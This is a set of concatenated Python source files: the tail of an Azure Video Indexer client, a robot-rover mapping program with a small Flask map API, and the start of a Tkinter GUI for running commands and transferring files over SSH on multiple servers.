print("Error retrieving response for video from azure: ")
print(response.json())
return 0, 0, {}
verbose_language_data_url = response.json()
#print(y) #prints the retrieved json
response = requests.get(str(verbose_language_data_url), verify=False)
response_json = response.json()
language = response_json["MasterLanguage"]
confidence = response_json["Confidence"]
return language, confidence, response_json
def index_files(self,directory):
Dict = self.get_video_ids()
D2 = [j for j in Dict.values()]
threads = []
for file in os.listdir(directory):
if str(file) not in D2:
video_path = directory + "/" + str(file)
logging.info("Uploading " + str(file))
threads.append(threading.Thread(target=self.upload_video_file, args=(str(file),video_path)))
for i in threads:
i.start()
for i in threads:
i.join()
#wait for all child processes to return
# continue
return 0
def clean_index(self, arr): # arr contains index numbers of files to be deleted
location = self.account_type
accountId = self.account_id
accessToken = self.access_token
for i in arr:
videoId = i
logging.info("Deleting " + videoId)
req = requests.delete(
"https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}?accessToken={3}".format(location, accountId,
videoId, accessToken))
if str(req.status_code) != str(204):
logging.warning("Failed to Delete " + videoId)
return 0
|
rover_a.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser
import logging
import numpy
import threading
import time
import Adafruit_PCA9685
import atexit
from flask import Flask
from sqlalchemy import create_engine, case
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import func
from models import Base, Map, MapCell, Scan, ScanResult
from scanner import Scanner
from trackcontroller import TrackController
from util import bresenham, pol2cart
# Configuration
MY_NAME = 0x0061
GPIO_PIN_WHEEL_ENCODER_INT = 4
I2C_ADDR_FORWARD_DISTANCE = 0x29
I2C_ADDR_PWM_CONTROLLER = 0x4F
I2C_ADDR_WHEEL_CONTROLLER = 0x6F
I2C_ADDR_WHEEL_ENCODERS = 0x27
PWM_FORWARD_SCANNER = 3
# Calibration
FORWARD_SCANNER_DEGREES_MIN = 6
FORWARD_SCANNER_DEGREES_MAX = 174
FORWARD_SCANNER_PULSE_MIN = 150
FORWARD_SCANNER_PULSE_MAX = 599
# Initialization
# logging.basicConfig(level=logging.INFO, format='%(levelname)8s (%(threadName)-10s) %(message)s')
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)8s (%(threadName)-10s) %(name)s: %(message)s')
log = logging.getLogger(__name__)
class RoverA:
def __init__(self):
log.info("Hello! Starting a-Rex")
# Parse Config
Config = ConfigParser.ConfigParser()
Config.read("config.ini")
# Init DB
connection_string = Config.get('database', 'engine')
engine = create_engine(connection_string, echo=False)
Base.metadata.create_all(engine)
self.DBSession = sessionmaker(bind=engine)
self.pwm = Adafruit_PCA9685.PCA9685(I2C_ADDR_PWM_CONTROLLER)
self.pwm.set_pwm_freq(60)
# self.wheels = TrackController(GPIO_PIN_WHEEL_ENCODER_INT, mot_addr=I2C_ADDR_WHEEL_CONTROLLER,
# enc_addr=I2C_ADDR_WHEEL_ENCODERS)
self.scanner = Scanner(self.pwm, sensor_addr=I2C_ADDR_FORWARD_DISTANCE, pwm_servo_index=PWM_FORWARD_SCANNER,
servo_pulse_min=FORWARD_SCANNER_PULSE_MIN, servo_pulse_max=FORWARD_SCANNER_PULSE_MAX,
servo_degrees_min=FORWARD_SCANNER_DEGREES_MIN,
servo_degrees_max=FORWARD_SCANNER_DEGREES_MAX)
# Globals
self.position = (0, 0)
self.rotation = 90 # polar degree 0 points towards 'east' cartesian (∞,0) rex starts pointed 'north' on map
# Get Map
try:
default_map_name = Config.get('map', 'name')
except ConfigParser.NoSectionError:
default_map_name = 'default'
session = self.DBSession()
default_map = session.query(Map).filter(Map.name == default_map_name).one_or_none()
if default_map is not None:
self.map = default_map
else:
log.info('Creating new map [{0}]'.format(default_map_name))
new_map = Map(name=default_map_name, scale=50)
session.add(new_map)
session.commit()
self.map = new_map
log.info('Using map {0}'.format(self.map))
# Start API
self.api_thread = threading.Thread(target=self.run_api)
self.api_thread.start()
def run(self):
session = self.DBSession()
val = self.do_scan()
session.add(val)
session.commit()
hits, misses = self.make_map_cells(val)
log.info("Updating Hits")
session.bulk_save_objects(hits)
session.commit()
log.info(hits[0])
log.info("Updating Misses")
session.bulk_save_objects(misses)
session.commit()
log.info(misses[0])
log.info("Done")
exit()
def do_scan(self, scan_count=1, rescan_tries=5):
log.info("Starting Scan Quality[{0}]".format(scan_count))
new_scan = Scan(x=self.position[0], y=self.position[1], rotation=self.rotation, quality=scan_count)
raw_scan = self.scanner.do_scan(scan_count=scan_count, rescan_tries=rescan_tries)
results = []
for deg, measurement in enumerate(raw_scan):
if measurement is not None:
results.append(ScanResult(angle=deg, distance=measurement))
new_scan.scan_results = results
return new_scan
def make_map_cells(self, scan):
hits = []
misses = []
for result in scan.scan_results:
if result.distance is not -1:
point1 = self.position
cart = pol2cart(result.distance / self.map.scale, numpy.radians(result.angle + (self.rotation - 90)))
point2 = (cart[0] + self.position[0], cart[1] + self.position[1])
line_points = bresenham(point1, point2)
hit = line_points.path.pop()
hits.append(hit)
for line_point in line_points.path:
misses.append(line_point)
misses_dup_len = len(misses)
misses = set(misses)
log.info("Found Misses: {0} ({1}) Hits: {2}".format(len(misses), misses_dup_len, len(hits)))
hit_cells = []
for hit in hits:
hit_cell = MapCell(map=self.map, x=hit[0], y=hit[1], hit=True, scan=scan)
hit_cells.append(hit_cell)
miss_cells = []
for miss in misses:
miss_cell = MapCell(map=self.map, x=miss[0], y=miss[1], hit=False, scan=scan)
miss_cells.append(miss_cell)
return hit_cells, miss_cells
def get_map_dimensions(self):
session = self.DBSession()
max_x = session.query(MapCell.x.label('x')).order_by(MapCell.x.desc()).first().x
min_x = session.query(MapCell.x.label('x')).order_by(MapCell.x.asc()).first().x
max_y = session.query(MapCell.y.label('y')).order_by(MapCell.y.desc()).first().y
min_y = session.query(MapCell.y.label('y')).order_by(MapCell.y.asc()).first().y
return (min_x, min_y), (max_x, max_y)
def get_map(self):
map_min, map_max = self.get_map_dimensions()
session = self.DBSession()
map_query = session.query(MapCell.x.label('x'),
MapCell.y.label('y'),
(func.sum(case({'TRUE': 1.0},
value=MapCell.hit,
else_=0.0)) / func.count(MapCell.hit)).label('p')). \
group_by(MapCell.x, MapCell.y)
w = map_max[0] - map_min[0]
h = map_max[1] - map_min[1]
map_grid = [[None for _ in range(h + 1)] for _ in range(w + 1)]
for cell in map_query.all():
map_grid[cell.x - map_min[0]][cell.y - map_min[1]] = cell.p
return map_grid
def make_text_map(self, map_grid):
w = len(map_grid)
h = len(map_grid[0])
line = ''
for y in range(h):
for x in range(w):
cell = map_grid[x][h - y - 1]
if cell is None:
line += ' '
elif cell == 1:
line += '*'
else:
line += str(int(cell * 10))
line += '\n'
return line
def run_api(self):
app = Flask(__name__)
@app.route("/map")
def hello():
map_grid = self.get_map()
return self.make_text_map(map_grid)
app.run(host='0.0.0.0')
|
jssh.py | # -*- coding: utf-8 -*-
# 报错信息为弹出框
#修改多线程
#执行进度优化
from Tkinter import *
from tkFileDialog import *
from threading import Thread,Semaphore
from datetime import datetime
import gl
from server import *
from ttk import Combobox
from tkFont import Font,NORMAL
# import atexit
from signal import signal,SIGTERM,SIGINT
import sys
import os
from cPickle import dump,load
from time import *
import platform
import re
# import tkMessageBox
def main():
reload(sys)
sys.setdefaultencoding('utf8')
def find_it(event, i):
target = "--------------------------------------%s\n" % i
where = text.search(target, '0.0', END)
if where:
pastit = where + ('+%dc' % len(target))
text.tag_add(SEL, where, pastit)
text.mark_set(INSERT, pastit)
text.see(INSERT)
text.focus()
def xshell(event,i):
if gl.server_all[i].connect_status:
shell = gl.server_all[i].ssh.invoke_shell()
def send_ctrl_c(event):
shell.send('\x03')
def single_exec_cmd(event, i):
cmd = xshell_entry.get()
if cmd:
shell.send(cmd+'\x0a')
xshell_entry.delete(0, END)
else:
shell.send('\x0a')
xshell_top=Toplevel()
xshell_top.attributes("-topmost", 1)
xshell_top.title("%s@%s"%(gl.server_all[i].username,i))
def on_closing():
shell.close()
xshell_top.destroy()
xshell_top.protocol("WM_DELETE_WINDOW", on_closing)
xshell_text = Text(xshell_top, bg='black', fg='green')
xshell_scroll = Scrollbar(xshell_top, command=xshell_text.yview)
xshell_text.configure(yscrollcommand=xshell_scroll.set)
xshell_scroll.pack(side=RIGHT, fill=Y)
xshell_text.pack(fill=BOTH,expand=YES)
xshell_Label=Label(xshell_top, text="command:")
xshell_Label.pack(side=LEFT)
xshell_entry = Entry(xshell_top, insertbackground='green', width=50)
xshell_entry.bind('<Key-Return>',lambda event,i=i:single_exec_cmd(event,i))
xshell_entry.bind('<Control-c>', send_ctrl_c)
xshell_entry.pack(fill=X)
def put_resoult():
sleep(1)
while True:
try:
xshell_text.insert(END,re.sub('\[.*?m','',shell.recv(1024)))
sleep(0.1)
xshell_text.see(END)
except:
break
Thread(target=put_resoult).start()
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR")
err_text = Label(tl, bg='black', fg='red',width=50, height=10, text="The host is not be connected!\n")
err_text.pack(fill=BOTH)
def open_list():
# 选择服务器清单
fd = askopenfilename(initialdir='.')
if fd:
save_log(log='%s open list %s\n' % (datetime.now(), fd))
root.title('Current file list:%s' % fd)
try:
server_list = open(fd)
except:
text.insert(END, "open file failed !\n")
server_list=None
if server_list:
gl.server_all.clear()
if any(gl.cbuts):
for i in gl.cbuts.keys():
gl.cbuts[i].destroy()
gl.cbuts.clear()
for (num, value) in enumerate(server_list):
if len(value) > 4 and not value.startswith('#'):
try:
hostname = value.split()[0]
except:
pass
try:
ipinfo = value.split()[1]
ip_addr = ipinfo.split(":")[0]
except:
pass
try:
if gl.server_all[hostname]:
err='ERROR,At line %s:Duplicate hostname %s\n' % (num,hostname)
text.insert(END, err)
save_log(log=err)
except:
pass
try:
if gl.server_all[hostname].ip_addr+":"+gl.server_all[hostname].port:
err='ERROR,At line %s:Duplicate ip and port %s\n' % (num,ipinfo)
text.insert(END, err)
save_log(log=err)
except:
pass
try:
try:
port = int(ipinfo.split(":")[1])
except:
port = 22
username = value.split()[2]
password = value.split()[3]
gl.server_all[hostname] = server(ip=ip_addr, port=port, username=username, password=password)
gl.server_all[hostname].selected = IntVar()
gl.cbuts[hostname] = (Checkbutton(listframe, text=hostname, font=ft, bg='black', foreground="blue", variable=gl.server_all[hostname].selected))
gl.cbuts[hostname].select()
gl.cbuts[hostname].pack()
gl.cbuts[hostname].bind("<Button-3>", lambda event, i=hostname:find_it(event, i))
gl.cbuts[hostname].bind("<Control-Button-1>", lambda event, i=hostname:xshell(event, i))
except IndexError:
err = 'ERROR,At line %s,wrong host info: %s\n' % (num + 1, value)
text.insert(END, err)
save_log(log=err)
server_list.close()
disconnect['state'] = DISABLED
if any(gl.server_all):
connect['state'] = ACTIVE
cmd_log.flush()
def connect():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def connect_do(i):
if semaphore.acquire():
gl.server_all[i].connect()
semaphore.release()
connect['state'] = DISABLED
text.insert(END,'Connecting,Please wait ...\n')
threads = []
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
if gl.server_all[i].connect_status:
pass
else:
i = Thread(target=connect_do,args=(i,),name=i)
i.start()
threads.append(i)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR")
# def closetl():
# err_topped=False
# tl.protocol("WM_DELETE_WINDOW",closetl)
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
if gl.server_all[a.getName()].connect_status:
gl.cbuts[a.getName()]['foreground'] = "green"
gl.connected = True
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
text.insert(END,'Connect completed\n')
#tkMessageBox.showinfo("Complete!", "Connect Complete!")
break
if gl.connected:
disconnect['state'] = ACTIVE
command_but['state'] = ACTIVE
file_but['state'] = DISABLED
connect['state'] = ACTIVE
def disconnect():
disconnect['state']=DISABLED
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def disconnect_do(i):
if semaphore.acquire():
gl.server_all[i].close()
semaphore.release()
if gl.connected:
threads = []
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
gl.cbuts[i]['foreground'] = "blue"
i = Thread(target=disconnect_do,args=(i,),name=i)
i.start()
sleep(0.02)
root.update()
threads.append(i)
for a in threads:
a.join()
gl.connected = False
for r in gl.server_all.keys():
if gl.server_all[r].connect_status:
gl.connected = True
if gl.connected:
disconnect['state'] = ACTIVE
command_but['state'] = ACTIVE
file_but['state'] = DISABLED
else:
disconnect['state'] = DISABLED
connect['state'] = ACTIVE
command_but['state'] = DISABLED
file_but['state'] = ACTIVE
def gexe_cmd():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def gexe_do(i,cmd):
if semaphore.acquire():
gl.server_all[i].exec_cmd(cmd)
semaphore.release()
command_but['state'] = DISABLED
gcmd = entry.get()
save_log(log='%s exec cmd: %s\n' % (datetime.now(), gcmd))
gl.history_cmd.reverse()
del gl.history_cmd[1000:]
gl.history_cmd.append(gcmd)
gl.history_cmd.reverse()
entry['values'] = gl.history_cmd
history_file = open(gl.history_file, 'w')
dump(gl.history_cmd, history_file)
history_file.close()
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("exec command:%s" % gcmd)
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
clear()
root.update()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
try:
w_text.insert(END,'%s\n' % i)
except:
pass
gl.cbuts[i]['foreground'] = "green"
#a = Thread(target=gl.server_all[i].exec_cmd,kwargs={'cmd':"LANG=zh_CN.UTF-8;%s" % gcmd},name=i)
a = Thread(target=gexe_do,kwargs={'i':i,'cmd':gcmd},name=i)
a.start()
sleep(0.02)
root.update()
threads.append(a)
command_but['state'] = ACTIVE
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:execcmd %s" % gcmd)
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
sleep(0.02)
root.update()
if gl.server_all[a.getName()].result:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, gl.server_all[a.getName()].result)
text.see(END)
save_log(log=gl.server_all[a.getName()].result)
sleep(0.02)
root.update()
if not gl.server_all[a.getName()].result and not gl.server_all[a.getName()].err:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
sleep(0.02)
gl.server_all[a.getName()].err = ''
gl.server_all[a.getName()].result = ''
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished execcmd:%s (%s)\n" % (gcmd,datetime.now()))
save_log(log="######################all the servers finished execcmd:%s (%s)\n" % (gcmd,datetime.now()))
try:
if w_text.get(0.0,END).split():
pass
else:
wait_t.destroy()
except:
pass
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "exec cmd :\n %s \n Complete!" % gcmd)
def get_ui():
global getfile_top
getfile_top = Toplevel(root)
getfile_top.attributes("-topmost", 1)
getfile_top.title("get file")
get_remote = Label(getfile_top, text="remote file:")
get_remote.grid(row=0, column=0)
global get_re
get_re = Entry(getfile_top, insertbackground='green', width=50)
get_re.grid(row=0, column=1)
get_locate = Label(getfile_top, text="local dir:")
get_locate.grid(row=1, column=0)
global get_lo
get_lo = Entry(getfile_top, insertbackground='green', width=50)
get_lo.grid(row=1, column=1)
def get_file_select():
get_filename=askdirectory()
get_lo.delete(0, END)
get_lo.insert(END,get_filename)
get_select_but=Button(getfile_top,text='...',command=get_file_select)
get_select_but.grid(row=1,column=2)
getfile_sub_but = Button(getfile_top, text='get', command=get_file)
getfile_sub_but.grid(row=2)
def get_file():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def get_do(i,lo_path,re_file,FileSend):
if semaphore.acquire():
gl.server_all[i].FileTransfer(lo_path=lo_path,re_file=re_file,FileSend=FileSend)
semaphore.release()
re_file=get_re.get()
lo_file=get_lo.get()
if re_file and lo_file:
try:
gl.thread_num=int(thread_num_entry.get())
except:
gl.thread_num=int(10)
save_log(log='%s get file: %s\n' % (datetime.now(), re_file))
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("Get file:%s --> %s" % (re_file,lo_file))
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
root.update()
clear()
getfile_top.destroy()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
w_text.insert(END,'%s\n' % i)
a = Thread(target=get_do,kwargs={'i':i,'lo_path':lo_file,'re_file':re_file,'FileSend':0},name=i)
a.start()
threads.append(a)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:get file %s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
elif gl.server_all[a.getName()].get_file_status:
try:
where = w_text.search('%s' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, "get file %s %s\n" % (re_file, gl.server_all[a.getName()].get_file_status))
save_log(log="get file %s %s\n" % (re_file, gl.server_all[a.getName()].get_file_status))
gl.server_all[a.getName()].result = ''
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished get file:%s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
save_log(log="######################all the servers finished get file:%s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
if w_text.get(0.0, END).split():
pass
else:
wait_t.destroy()
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "get file:\n %s \n Complete!" % re_file)
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:get file %s --> %s (%s)\n" % (re_file,lo_file,datetime.now()))
err_text = Label(tl, bg='black', fg='red',width=100, height=10, text="ERROR:There is no file name or path name!")
err_text.pack(fill=BOTH)
def send_ui():
global sendfile_top
sendfile_top = Toplevel()
sendfile_top.attributes("-topmost", 1)
sendfile_top.title("send file")
send_remote = Label(sendfile_top, text="remote file:")
send_remote.grid(row=0, column=0)
global send_re
send_re = Entry(sendfile_top, insertbackground='green', width=50)
send_re.grid(row=0, column=1)
def send_file_select():
send_filename=askopenfilename()
send_lo.delete(0, END)
send_lo.insert(END,send_filename)
send_re.delete(0,END)
send_re.insert(END,"/tmp/"+os.path.split(send_filename)[-1])
send_select_but=Button(sendfile_top,text='...',command=send_file_select)
send_select_but.grid(row=1,column=2)
send_locate = Label(sendfile_top, text="local file:")
send_locate.grid(row=1, column=0)
global send_lo
send_lo = Entry(sendfile_top, insertbackground='green', width=50)
send_lo.grid(row=1, column=1)
sendfile_sub_but = Button(sendfile_top, text='send', command=send_file)
sendfile_sub_but.grid(row=2)
def send_file():
try:
thread_num=int(thread_num_entry.get())
except:
thread_num=int(10)
semaphore= Semaphore(thread_num)
def send_do(i,lo_file,re_file,FileSend):
if semaphore.acquire():
gl.server_all[i].FileTransfer(lo_file=lo_file,re_file=re_file,FileSend=FileSend)
semaphore.release()
re_file=send_re.get()
lo_file=send_lo.get()
if re_file and lo_file:
try:
gl.thread_num=int(thread_num_entry.get())
except:
gl.thread_num=int(10)
save_log(log='%s send file: %s --> %s \n' % (datetime.now(), lo_file, re_file))
threads = []
wait_t = Toplevel()
wait_t.attributes("-topmost", 1)
wait_t.title("Send file:%s --> %s" % (lo_file, re_file))
w_text = Text(wait_t, bg='black', fg='green')
w_scroll = Scrollbar(wait_t, command=w_text.yview)
w_text.configure(yscrollcommand=w_scroll.set)
w_scroll.pack(side=RIGHT, fill=Y)
w_text.pack(fill=BOTH,expand=YES)
sleep(0.02)
root.update()
clear()
sendfile_top.destroy()
for i in gl.server_all.keys():
if gl.server_all[i].selected.get() == 1:
w_text.insert(END,'%s\n' % i)
a = Thread(target=send_do,kwargs={'i':i,'lo_file':lo_file,'re_file':re_file,'FileSend':1},name=i)
a.start()
threads.append(a)
sleep(0.02)
root.update()
while True:
for a in threads:
sleep(0.02)
root.update()
if not a.isAlive():
sleep(0.02)
root.update()
if gl.server_all[a.getName()].err:
gl.cbuts[a.getName()]['foreground'] = "red"
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
if where:
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
try:
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
except:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:send file %s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
err_text = Text(tl, bg='black', fg='red')
err_scroll = Scrollbar(tl, command=err_text.yview)
err_text.configure(yscrollcommand=err_scroll.set)
err_scroll.pack(side=RIGHT, fill=Y)
err_text.pack(fill=BOTH,expand=YES)
err_text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
err_text.insert(END, gl.server_all[a.getName()].err)
save_log(log=gl.server_all[a.getName()].err)
err_text.see(END)
gl.server_all[a.getName()].err = ''
sleep(0.02)
root.update()
threads.remove(a)
elif gl.server_all[a.getName()].send_file_status:
try:
where = w_text.search('%s\n' % a.getName(), '0.0', END)
pastit = where + ('+%dc' % (len(a.getName())+1))
w_text.delete(where, pastit)
except:
pass
text.insert(END, "--------------------------------------%s\n" % a.getName())
save_log(log="--------------------------------------%s\n" % a.getName())
text.insert(END, "send file %s --> %s %s\n" % (lo_file, re_file, gl.server_all[a.getName()].send_file_status))
save_log(log="send file %s --> %s %s\n" % (lo_file, re_file, gl.server_all[a.getName()].send_file_status))
gl.server_all[a.getName()].result = ''
sleep(0.02)
root.update()
threads.remove(a)
if not threads:
break
text.insert(END, "######################all the servers finished send file:%s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
save_log(log="######################all the servers finished send file:%s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
if w_text.get(0.0, END).split():
pass
else:
wait_t.destroy()
cmd_log.flush()
#tkMessageBox.showinfo("Complete!", "send file:\n %s \n Complete!" % lo_file)
else:
tl = Toplevel()
tl.attributes("-topmost", 1)
tl.title("ERROR:send file %s --> %s (%s)\n" % (lo_file,re_file,datetime.now()))
err_text = Label(tl, bg='black', fg='red',width=100, height=10, text="ERROR:There is no file name or path name!")
err_text.pack(fill=BOTH)
# gui
class AutocompleteCombobox(Combobox):
def set_completion_list(self, completion_list):
"""Use our completion list as our drop down selection menu, arrows move through menu."""
self._completion_list = sorted(completion_list, key=str.lower) # Work with a sorted list
self._hits = []
self._hit_index = 0
self.position = 0
self.bind('<KeyRelease>', self.handle_keyrelease)
self['values'] = self._completion_list # Setup our popup menu
def autocomplete(self, delta=0):
if delta:
self.delete(self.position, END)
else:
self.position = len(self.get())
_hits = []
for element in self._completion_list:
if element.lower().startswith(self.get().lower()):
_hits.append(element)
if _hits != self._hits:
self._hit_index = 0
self._hits = _hits
if _hits == self._hits and self._hits:
self._hit_index = (self._hit_index + delta) % len(self._hits)
if self._hits:
self.delete(0, END)
self.insert(0, self._hits[self._hit_index])
self.select_range(self.position, END)
def handle_keyrelease(self, event):
# if event.keysym == "BackSpace":
# self.delete(self.index(INSERT), END)
# self.position = self.index(END)
# if event.keysym == "Left":
# if self.position < self.index(END):
# self.delete(self.position, END)
# else:
# self.position = self.position - 1
# self.delete(self.position, END)
if event.keysym == "Right":
self.position = self.index(END)
if len(event.keysym) == 1:
self.autocomplete()
class FullScreenApp(object):
def __init__(self, master, **kwargs):
self.root = master
# self.tk.attributes('-zoomed', True) # This just maximizes it so we can see the window. It's nothing to do with fullscreen.
self.frame = Frame(self.root)
self.frame.pack()
self.state = False
self.root.bind("<F11>", self.toggle_fullscreen)
self.root.bind("<Escape>", self.end_fullscreen)
def toggle_fullscreen(self, event=None):
self.state = not self.state # Just toggling the boolean
self.root.attributes("-fullscreen", self.state)
return "break"
def end_fullscreen(self, event=None):
self.state = False
self.root.attributes("-fullscreen", False)
return "break"
root = Tk()
def close_all():
for i in gl.server_all.keys():
if gl.server_all[i].connect_status:
gl.server_all[i].close()
root.destroy()
root.protocol("WM_DELETE_WINDOW", close_all)
root.option_add('*background', 'black')
root.option_add('*foreground', 'green')
root.title('jssh')
if platform.system()=='Linux':
jssh_home=os.environ['HOME']+"/jssh"
try:
os.makedirs(jssh_home)
except:
pass
gl.logfile=jssh_home+'/log.txt'
gl.history_file=jssh_home+'/history.data'
elif platform.system()=='Windows':
try:
os.makedirs(r'c:\jssh')
except:
pass
gl.logfile=r'c:\jssh\log.txt'
gl.history_file=r'c:\jssh\history.data'
else:
print 'system type is not supported'
if os.path.isfile(gl.history_file):
pass
else:
open(gl.history_file,'w').write('''(lp1
S'df -h'
p2
aS'ifconfig'
a.
''')
#root.iconbitmap(default='jssh.ico')
# 菜单栏
def open_logfile():
#os.system('notepad %s' % gl.logfile)
tl = Toplevel()
tl.title("Log")
log_text = Text(tl, bg='black', fg='green')
log_scroll = Scrollbar(tl, command=log_text.yview)
log_text.configure(yscrollcommand=log_scroll.set)
log_scroll.pack(side=RIGHT, fill=Y)
log_text.pack(fill=BOTH,expand=YES)
log=file(gl.logfile)
for i in log:
log_text.insert(END, i)
log_text.see(END)
log.close()
def help():
help_msg = '''
You should create server-list file frist:
formate:hostname ip:port username password
eg:hostname 192.168.1.10:22 root password
use utf-8 formate better,one server one line
Use Ctrl + left-click a server that can be manipulated separately.
Use right-click on a server you can find it in the results.
F11 for full screen!
'''
ht = Toplevel()
ht.attributes("-topmost", 1)
hl = Label(ht, text=help_msg, justify="left").pack()
menubar = Menu(root)
menubar.add_command(label="send file",command=send_ui)
menubar.add_command(label="get file", command=get_ui)
menubar.add_command(label="log", command=open_logfile)
menubar.add_command(label="help", command=help)
menubar.add_command(label="exit", command=close_all)
root.config(menu=menubar)
# 命令窗口
command_frame = Frame(root, bd=1, relief=SUNKEN)
command_frame.pack(side=TOP, fill=X)
history_file = open(gl.history_file, 'r')
try:
gl.history_cmd = (load(history_file))
except:
